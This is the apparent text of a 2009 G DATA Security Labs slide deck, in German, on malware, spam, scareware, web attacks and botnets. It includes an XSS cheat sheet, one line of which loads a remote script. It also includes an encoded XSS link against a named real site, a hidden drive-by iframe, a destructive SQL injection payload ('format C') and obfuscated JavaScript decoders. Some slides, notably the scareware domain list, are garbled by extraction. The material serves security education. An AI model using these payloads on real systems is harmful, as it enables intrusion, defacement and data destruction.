g data.gi-dortmund.malware-trends2009.print.ppt ... · geschützt. geschützter. g data....
TRANSCRIPT
Geschützt. Geschützter. G DATA.
Malware-Trends 2009
Ralf Benzmüller G DATA Security Labs
Agenda !! Kurzvorstellung G DATA Security Labs !! Malware-Report Juli – Dezember 2008 !! Neue Verbreitungswege von Malware •! E-Mail & Spam •! Webseiten
!! Botnetze
Security Labs: Aufgaben !! Entwicklung von Schutzkonzepten !! Integration in Schutzsoftware !! Risiko-Szenarien !! Kundeninformationen !! Tests •! Lizenzprodukte •! Eigene Technologien
Malware sammeln
Spamtraps WebCrawler Honeypots Tauschprg. Kunden
Zahlen zur Malwaresammlung !! Samples: 5.278.023 !! Malware: 476.609
!! Zum Vergleich: AV-Test !! 420.921 aktive Schädlinge letzte Woche in D !! 616.581 aktive Schädlinge letzte Woche weltweit
Malware sammeln Monat Viren Samples SigKAV SigAVA
2 2008 5.865 158.524 36.331 4.780
3 2008 10.346 185.276 66.268 8.013
4 2008 11.611 220.825 47.360 12.073
5 2008 15.291 151.009 70.153 9.637
6 2008 19.588 227.973 68.722 6.617
7 2008 22.110 179.393 108.590 7.836
8 2008 24.127 225.221 98.528 2.357
9 2008 17.544 151.589 98.699 2.691
10 2008 14.857 154.439 70.888 1.775
11 2008 74.962 237.734 90.411 2.913
12 2008 80.384 256.905 99.401 1.414
1 2009 40.674 374.919 148.946 1.793
Summe 340.128 2.523.807 1.004.297 63.869
Malware analysieren Datei
-eigenschaften Statische
Analyse/ Graphen Dynamische
Analyse/ Sandbox
Datenbank
Manuelle Detailanalyse
Multiscanner
Malware analysieren !! Zweckgebunden !! Weitgehend automatisiert !! Tools zum Ermitteln von
Oberflächeninformationen !! Dynamische Analyse mit CWSandbox !! Statische Analyse u.a. mit Graphen
Agenda !! Kurzvorstellung G DATA Security Labs !! Malware-Report Juli – Dezember 2008 !! Neue Verbreitungswege von Malware •! E-Mail & Spam •! Webseiten
!! Botnetze
Malware-Report 2008 H2 !! 2008: 894.250 neue Schädlinge
ca. 6,7 Mal mehr als 2007 !! 576.002 neue Schädlinge im 2. Halbjahr
Steigerung um das 1,8 fache gegenüber dem ersten Halbjahr
Malware-Report 2008 H2
Malware-Report 2008 H2
Malware-Report 2008 H2
!! JavaScript Malware nimmt ab (1910 vs 2650) !! Flash-Malware nimmt zu (321 vs 231)
Flash-Phishing
Agenda !! Kurzvorstellung G DATA Security Labs !! Malware-Report Juli – Dezember 2008 !! Neue Verbreitungswege von Malware •! E-Mail •! Webseiten
!! Botnetze
Verbreitungswege von Malware
!! E-Mail !! Webseiten •! Download •! Drive-By Infektion
!! Net-Worm
!! Instant Message WLAN
!! USB-Datenträger !! CDs, DVDs !! P2P
GetCodec im Media Player
GetCodec im MediaPlayer !! WMV/WMA enthalten eine Sektion, die
den erforderlichen Codec bestimmen. !! Diese Sektion wird so manipuliert, dass der
Media Player einen Codec verlangt. !! Spätere Varianten auch mit MP3 und MP2
Dateien.
Der Trick mit den Links !!Rechnung.zip enthält •! Rechnung.txt.lnk •! Zertifikat.ssl
!! http://www.gdata.de/de/virenforschung/news/news-details/article/928-warnung-vor-gefaelschten-rechn.html
Top 10 CNN-News Schlagzeilen
1. SUSPECT IN BEHEADING IDENTIFIED 2. JUDGE TAKEN OFF LAST JENA 6 CASES 3. PEOPLE MAG GETS PITT-JOLIE PIX 4. ATTACK IN TORONTO CALLED RACIAL 5. IREPORTERS' UNUSUAL NAMES 6. MOTHER PLEADS FOR CHILD'S RETURN 7. KARADZIC: I MADE DEAL WITH U.S. 8. SUSPECT ARRESTED IN SWIM KILLINGS 9. ANTHRAX SUSPECT APPARENT SUICIDE 10. MCCAIN: OBAMA CRITICISM 'FAIR'
Top 10 CNN-News Videos
1. MONTAUK 'MONSTER' 2. RACY PHOTOS OF TODDLER'S MOM 3. NEWS OF THE ABSURD EPISODE 54 4. POLICE BEATING DISPUTE 5. MOM PLEADS FOR GIRL'S RETURN 6. DEFENDANT FAKES HEART ATTACK 7. KILLER CARRIED VICTIM'S HEAD 8. MURDER CONFESSION RECANTED 9. ANTHRAX SUSPECT'S HOME 10. HECKLERS INTERRUPT OBAMA TALK
Promi-Spam
Promi-Spam
Femmes %
Angelina Jolie 18 %
Britney Spears 9,8 %
Paris Hilton 8,8 %
Madonna 2 %
Pamela Anderson 1,9 %
Hommes %
Osama bin Laden 3,4 %
Brad Pitt 1,8%
John McCain 1,4 %
Georg W. Bush 1,2 %
Barack Obama 1,1 %
Falsche Freunde
Spam-Trends
•! Täglich ca. 130 Mia. Spam-Mails
•! 85% Spam per Botnetz
•! Spam – Phishing
•! Spam – Malware (Dateien oder URLs)
•!Spam-Schutz = Malware-Schutz
Spam: Zahlen und Daten 2007: 84.6 %
2008: 74 %
Spam-Trends
•! 80% aller Spam-Mails werden von 110 Gangs verschickt
•! 6 der Top 10 Spammer agieren in Osteuropa (Russland, Ukraine)
Top Spam Gangs Rang Land #
1 USA 62
2 Russland 9
2 Canada 9
4 China 4
5 Brasilien, Indien, Japan, Ukraine
3
spamhaus.org, 12.Nov 2008
Insgesamt: 110 Gangs für 80% aller Spam-Mails
Spamerkennung •! Absender
•! Whitelist & Blacklist •! Realtime Blackhole List von Spam-Relays
•! Inhaltsfilter •! Schlüsselwörter in Betreff oder Text •! URL-Blocking •! E-Mail Eigenschaften (Heuristik) •! Bayes-Filter erkennt Worthäufigkeiten
•! Meta •! Greylisting •! Hash database
Spamschutz: Textfilter
Spamschutz: Textfilter
HTML TABLE <table border="0" width="74"> <TR vAlign=bottom> <td rowSpan="2" nowrap>NE</TD><TD><font color="#DDC3EB">9</font></TD> <td rowSpan="2" nowrap> </TD><TD></TD> <td rowSpan="2" nowrap>N</TD> <TD><font color="#EBC3C5">S</font></TD> <td rowSpan="2" nowrap>! WE</TD> <TD><font color="#E3C3EB">R</font></TD> <td rowSpan="2" nowrap>M</TD> <TD></TD> <td rowSpan="2" nowrap>8</TD> <TD></TD> <td rowSpan="2" nowrap>0</TD> <TD><font color="#C3EBC3">O</font></TD></tr> <tr vAlign=bottom> <td nowrap>W</TD> <td nowrap>CASI</TD> <td nowrap>O</TD> <td nowrap>LCO</TD> <td nowrap>E BONUS $1</TD> <td nowrap>0</TD> <td nowrap> !!!</TD></tr></table>
Reputation unterlaufen !! CAPTCHAs von Freemailern knacken !! E-Mail-Zugangsdaten per Phishing oder
Spyware stehlen !! Missbrauch legitimer Hosting-Sites
Google Docs-Spam !! Seit Jan 2007 !! Link zu Google Docs
Legitime Bildquellen
!! Flickr !! ImageShack !! Live.com !! BlogSpot
URL Redirection
!! http://rds.yahoo.com/_ylt=3DA0ge... EXP=3D.../**http%3a//SPAMSITE.com/
!! http://www.google.com/pagead/iclk?sa= l&...&adurl=http://SPAMSITE.com
Agenda !! Kurzvorstellung G DATA Security Labs !! Malware-Report Juli – Dezember 2008 !! Neue Verbreitungswege von Malware •! E-Mail & Spam •! Webseiten
!! Botnetze
Scareware
!"#!!$%&'()*+,-./
!$%&'()*!".!**'.-+,-./
#!((0&'()*+,-./
,-.1)20(&!32+,-./
4'3'2!"0(*,5)26+,-./
#0((!.0$2!$%&'()*+,-./
7"20(1(-3(!.+,-./
7"2(040&'()*+,-./
300$'$#0,%0+,-./
5!(44('&07"20(+,-./
80'$0'$#08%-$0$+,-./
"-$3)0&'01,+,-./
$-$*2-1!$%&'()*+,-./
1,!$%&'(0$"-0*)$3+,-./
Aktionen
Ihr PC ist infiziert
Scareware
Scareware Auswahl !! Advanced Cleaner Free !! AntiMalware 2009 !! AntiSpyware Pro XP !! Antivirus 2008 XP !! Antivirus 2010 !! Antivirus Lab 2009 !! Antivirus Security !! Antivirus XP 2008 !! Drive Cleaner !! eAntivirusPro !! eKerberos !! Error Digger !! Error Safe !! Internet Antivirus !! Micro Antivirus 2009 !! MS Antivirus !! Online PC Guard
!! Personal Antispy !! Power Antivirus !! Power Antivirus 2009 !! Privacy Protector !! Rapid Antivirus !! Smart Antivirus 2009 !! System Antivirus 2008 !! Total Secure 2009 !! Virus Remover 2008 !! Virus Response Lab 2009 !! Win AntiVirusPro 2007 !! Win Fixer !! Windows Antivirus !! WinX Security Center !! XP Antispyware 2009 !! XP Antivirus !! XP Protector 2009
Scareware
Scareware verboten !! 11. Dezember 2008:
FTC untersagt Innovative Marketing, Inc. und ByteHosting Internet Services, LLC den Verkauf ihrer angeblichen Schutzprogramme Das Vermögen der Firmen wird eingefroren.
Cross Site Scripting (XSS)
Funktionsweise XSS !! http://www.linksfraktion.de/kontakt.php?
nachname=&strasse=&plz=&ort=&mailadresse=&anfragetext=&eintrag=ok&send=Abschicken&vorname=%22%3E%3Cdiv%20style%3Dposition%3Arelative%3Bleft%3A-12pt%3Btop%3A-413pt%3Bbackground-color%3Awhite%3Bwidth%3A95%25%3B%3E27.05.2008%3Ch2%3EDie%20Linke%20stimmt%20f%C3%BCr%20Hotte%20K%C3%B6hler%3C%2Fh2%3ESelbstverst%C3%A4ndlich%20wurde%20auch%20diese%20Meldung%20%C3%BCber%20eine%20XSS-L%C3%BCcke%20eingeschmuggelt.%3C%2Fdiv%3E%3Cdiv%3E
XSS Cheat Sheet !! <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> !! <IMG SRC=javascript:alert('XSS')> !! <IMG
SRC=javascript:alert('XSS')>
!! <BODY BACKGROUND="javascript:alert('XSS')"> !! <BGSOUND SRC="javascript:alert('XSS');"> !! <BODY ONLOAD=alert('XSS')>
Vgl.: http://ha.ckers.org/xss.html
XSS - potential !! Defacements !! Daten aus Formularen stehlen (e.g. Login-Seiten,
Online Banking) !! Cookies stehlen (z.B. auf einer Webseite Befehle
im Namen des Cookie-Eigentümers ausführen) !! Wurm !! JavaScript Proxy !! Port Scanner
ClickJacking !! Einstellungen von Flash so
ändern, dass die Webcam angeschaltet wird
Funktionsweise Drive-by Infektion
!! <iframe src="http://example.com/bad.php visibility="hidden"...>
!! <script ... src="boese.js"> !! <img ... src="boese.js"> !! JavaScript nutzt Sicherheitslücken im
Browser und Browser-Plugins
SQL Injection !! search item: "foo" !! http://myserver.de/search.php?s=foo !! SELECT info, title FROM mytable WHERE s
like '%foo%'
SQL Injection !! search item
"foo' ; GO EXEC cmdshell('format C') --" !! SELECT info, title FROM mytable WHERE s
like '%foo' ; GO EXEC cmdshell('format C') --%'
!! This command would delete everything on drive C:
SQL Injection - potential !! Spy on data !! Data manipulation (e.g. insert malicious
IFRAME to resulting web page) !! Create new users !! Access to file system = compromise
database machine
Code Verschleierung !! "<sc" + "rip" + "t>"
!! var oiwetdk!er = decode; var rierjwtlkjfre = oiwetdk!er rierjwtlkjfre("%3C%73%63%72%69%70%74%3E");
!! Whitespace (0x0A, 0x0D)
!! document.write(unencode("% 3C%73%63%72%69%70%74%3E ");
Code Verschleierung unescape('%3C%73%63%72%69%70%74');
<script> var s='3C736372697074'; var o=''; for(i=0;i<s.length;i=i+2) { o=o+'%'+s.substr(i,2);} document.write(unescape(o)); </script>
Code-Verschleierung !! xml||var|if|function|document|domain|
send|return|path|wDate||select|name|begin|new|index|www|dc|expires|encodeURIComponent|http|com|POST|script|wormdoorkut|div|end|getCookie|orkut|
JavaScript Encoder - Input <SCRIPT> alert('XSS'); </SCRIPT>
JavaScript Encoder - Output <script language=javascript>
document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E')); dF('%264DTDSJQU%264F%2631bmfsu%2639%2638YTT%2638%263%3A%264C%2631%264D0TDSJQU%264F%261B1')
</script>
JavaScript Encoder dekodiert <script language="javascript">
function dF(s) { var s1=unescape(s.substr(0,s.length-1)); var t=''; for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1)); document.write(unescape(t));} </script>')); dF('&4DTDSJQU&4F&31bmfsu&39&38YTT&38&3:&4C&31&4D0TDSJQU&4F&1B1')
</script>
JavaScript Packer !! Dojo Shrink Safe !! MOOtools !! Dean Edwards Packer
Überblick auf.: http://www.secureworks.com/research/threats/thepacker/?threat=thepacker
Agenda !! Kurzvorstellung G DATA Security Labs !! Malware-Report Juli – Dezember 2008 !! Neue Verbreitungswege von Malware •! E-Mail •! Webseiten
!! Botnetze
Cybercrime-Ökonomie
Dealer
Infrastruktur !! Handelsplattform !! Botnetze !! Hosting
Zulieferer !! Malware !! Exploits !! AntiDetection !! Tools !! Daten
Cashing !! MoneyMule !! Carder !! Drops !! etc...
Kunden Anbieter !! Spam !! DDoS !! Phishing !! Adware !! Ransomware !! etc...
Werbung
Botnetze
Botnetze – Größe
2.2.2009: shadowserver.org
Botnetze C&C
2.2.2009: shadowserver.org
Geografische Verteilung 2007
2.2.2009: shadowserver.org
Botnetze – C&C Locations
Quelle: Shadowserver.org
Zombie Activity Level
Zombie static vs. dynamic
Botnetze !! Q4 2008: 301.000 neue Zombies pro Tag
Top 5 Spam Botnetze Pos Name #Bots #Spam
1 Srizbi 315.000 60 Mia/d
2 Bobax/ Kraken 185.000 9 Mia/d
3 Rustock 150.000 30 Mia/d
4 Cutwail 125.000 16 Mia/d
5 Storm 85.000 3 Mia/d Quelle: http://www.secureworks.com/research/threats/topbotnets/?threat=topbotnets
Malware-Report 2008 H2
Erpressung !! Verteilte Überlastangri"e (DDoS) •! Mailserver •! Webserver
2.2.2009: shadowserver.org
Malware-Report 2008 H2
Geschützt. Geschützter. G DATA